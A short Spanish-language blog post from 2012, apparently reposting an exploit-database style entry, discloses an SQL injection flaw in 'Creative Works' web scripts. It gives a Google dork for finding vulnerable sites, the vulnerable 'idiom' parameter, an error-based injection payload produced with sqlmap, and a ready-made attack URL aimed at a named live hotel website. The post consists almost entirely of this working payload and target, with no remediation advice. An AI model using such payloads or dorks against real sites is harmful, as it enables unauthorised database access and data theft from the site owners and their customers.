jueves, 10 de mayo de 2012

creativeworks full injeccion sql bug


# Exploit Title:Creative Works Multiple sql web scripts

# Google Dork:Powered by: Creative Works

# Date:10-05-2012

# Author: sh3ll0n sewate.net

# Software Link:www.creativeworks.com.ec

# Version:2012

# Tested on:linux and windows any os

#credits:Security Warriors Team SWT http://www.facebook.com/groups/279352788763082/

descripcion:

index.php?idiom=sql injection

herramienta sqlmap test bug sql

code inject test: idiom=1 AND (SELECT 2358 FROM(SELECT COUNT(*),CONCAT(CHAR(58,121,118,106,58),(SELECT (CASE WHEN (2358=2358) THEN 1 ELSE 0 END)),CHAR(58,97,97,102,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

ejemplo:

http://www.hotelesecuador.com.ec/index.php?idiom=1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,121,118,106,58),(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),CHAR(58,97,97,102,58),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)

creditos:cr0n0x de Security Warriors Team SWT
Publicado por en No hay comentarios:
Suscribirse a: Comentarios (Atom)